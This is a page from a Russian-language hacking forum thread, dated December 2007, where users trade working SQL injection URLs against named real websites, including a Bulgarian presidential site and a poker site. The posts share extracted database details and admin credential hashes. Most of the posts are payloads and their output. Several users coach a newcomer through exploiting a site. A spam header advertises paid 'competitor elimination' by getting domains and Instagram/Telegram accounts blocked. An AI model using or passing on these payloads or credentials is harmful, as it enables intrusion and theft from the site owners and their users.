УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 401 из 1242

401

Опции темы

Поиск в этой теме

Опции просмотра

#4001

10.12.2007, 12:43

Momiji

Постоянный

Регистрация: 25.08.2007

Сообщений: 530

Провел на форуме:
3926698

Репутация: 1446

Отправить сообщение для Momiji с помощью ICQ

Тут можно вынести всю базу:

Код:

http://www.3roms.com/index.php?page=rom_dl&rid=-1'+union+select+1,concat(username,0x3a,password),icq,4,5,6,7,convert(concat(user(),0x3,version(),0x3,database())+using+latin1),9,10,11,12+from+user+limit+1,2/*

Хеш с солью

Код:

http://www.3roms.com/index.php?page=rom_dl&rid=-1'+union+select+1,concat(username,0x3,password,0x3a,salt),icq,4,5,6,7,convert(concat(user(),0x3,version(),0x3,database())+using+latin1),9,10,11,12+from+user+limit+1,2/*

Последний раз редактировалось Momiji; 10.12.2007 в 21:50..

#4002

10.12.2007, 13:28

Saint-Sky

Участник форума

Регистрация: 14.07.2007

Сообщений: 108

Провел на форуме:
1888785

Репутация: 305

2 Momiji

Там хеш соленый, добавь в запрос "salt".

#4003

10.12.2007, 18:38

fRg

Участник форума

Регистрация: 28.12.2006

Сообщений: 111

Провел на форуме:
500695

Репутация: 524

Отправить сообщение для fRg с помощью ICQ

Чёт постов маловато....

silla.dk

Код:

http://www.silla.dk/nyhed.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5/*

4.0.18-nt:silla1:silla@cher

balatonfured.hu

Код:

http://www.balatonfured.hu/prg/nc/hirdomping2.php?&hir_lang=1&hir_akthely=61&hir_rovatid=116   &hir_hirid=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10/*

5.0.32-Debian_7etch1-log:balaton_admin:cece@innovex.veszprem.hu

Наша таба admins и в ней поля a_login_name и a_login_password

Усё...

#4004

10.12.2007, 18:45

Basurman

Постоянный

Регистрация: 10.11.2006

Сообщений: 416

Провел на форуме:
5636868

Репутация: 849

Отправить сообщение для Basurman с помощью ICQ

BlackCats, ты реально извращенец )

Код:

1+or+1=(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+(select+top+50+table_name+from+information_schema.tables))--

#4005

10.12.2007, 22:36

min7

Участник форума

Регистрация: 03.09.2005

Сообщений: 123

Провел на форуме:
1896022

Репутация: 259

Код:

http://www.tampereenpyrinto.fi/news.php?id=-77+union+select+1,2,concat_ws(char(58,58),user(),database(),version()),4,5,6,7/*

w8115768db@10.0.8.84::w8115768db::5.0.21
правда тормозит по-страшному

#4006

10.12.2007, 23:57

NilsonUA

Познающий

Регистрация: 25.11.2007

Сообщений: 55

Провел на форуме:
493288

Репутация: 58

Отправить сообщение для NilsonUA с помощью ICQ

вот... http://adamaz.ru/?id=18'+union+select+1,2,3/* помогиет полность раскрыть... просто мне становится интересно скули раскрывать... хочу научиться ))

#4007

11.12.2007, 00:04

Basurman

Постоянный

Регистрация: 10.11.2006

Сообщений: 416

Провел на форуме:
5636868

Репутация: 849

http://adamaz.ru/?id=-1'+union+select+concat_ws(0x3a,version(),user()),2 ,3/*

Sql-inj на официальном сайте президента Болгарии

#4008

11.12.2007, 00:09

~EviL~

Участник форума

Регистрация: 14.08.2007

Сообщений: 150

Провел на форуме:
686641

Репутация: 205

Sql-inj на официальном сайте президента Болгарии

Зацените

Код HTML:

http://www.president.bg/news.php?type=-6

Ну как?

#4009

11.12.2007, 01:19

SWAT

Участник форума

Регистрация: 14.12.2006

Сообщений: 211

Провел на форуме:
1541753

Репутация: 552

Код:

http://www.secureworldexpo.com/events/index.php?id=-230/**/union/**/select+1,VERSION(),3,4/*

Код:

http://www.brecorder.com/index.php?id=-465018+union+select+1,2,3,4,5,6,7,8,concat(user,0x3a,password),10,11,12,13,14+from+mysql.user/*

Последний раз редактировалось SWAT; 11.12.2007 в 01:33..

#4010

11.12.2007, 01:34

Momiji

Постоянный

Регистрация: 25.08.2007

Сообщений: 530

Провел на форуме:
3926698

Репутация: 1446

Код:

http://www.ipoker.com/index.php?page=6&sub=1%22+union+select+1,2,concat(user(),0x3,version(),0x3,database()),4,5/*

Чуток дополнил.

Код:

http://www.ipoker.com/index.php?page=6&sub=1%22+union+select+1,2,concat(user(),0x3,version(),0x3,database()),concat(username,0x3,password),5+from+ipoker_admin/*

User: ipoker@playtech-banner1
Version: 4.1.22-standard-log
Database: ipoker
Admin username: dooker
Password: 01cbad3d03f356443f5f79d62cf3680a

Последний раз редактировалось Momiji; 11.12.2007 в 03:33..

Страница 401 из 1242

401

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход